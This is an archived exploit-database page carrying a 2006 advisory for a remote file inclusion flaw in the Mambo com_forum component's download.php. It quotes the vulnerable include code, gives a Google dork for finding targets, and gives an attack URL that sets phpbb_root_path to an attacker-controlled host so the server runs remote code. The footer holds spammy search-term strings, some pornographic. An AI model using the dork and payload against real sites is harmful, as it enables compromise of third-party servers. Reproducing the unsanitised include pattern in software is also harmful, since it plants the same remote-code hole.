about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability




2006-07-09 com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility

download :
http://mamboxchange.com/frs/download.php/6873/phpbb_component1.2.4RC3.zip

bug found in file : download.php

define('IN_PHPBB', true);
//$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc ');
include($phpbb_root_path . 'common.'.$phpEx);


google dork: inurl:com_forum

http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[attacker]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha,
#papmahackerlink

securitydot.net - 2006-07-09

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 01:05:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.oola.c RPC over H ProFTPD 1. sexi read tieba.baid www.free 8 bbs.fw23.c phpmysms www.trish Redaxo.htm Nangi Ladk Freepornov 4209087 borderware php-nuke 2 solidphp belu pidhat e p pidhat e p yotub www.gpsbao news for C ipb 1.3 fi Pornohub IMHOT3B www.yuotob www.huaian Wollywood Redplantse Image actr sex pornp www.Sexwal www.indins macosx ssh Tecav sex.89 Free 3x .c Nick 64542693.p Http www.s www.guanda www.indian www.world t304t w.worldsex ww8.cnzzli Bagi www.bbs059 t830t www.heryou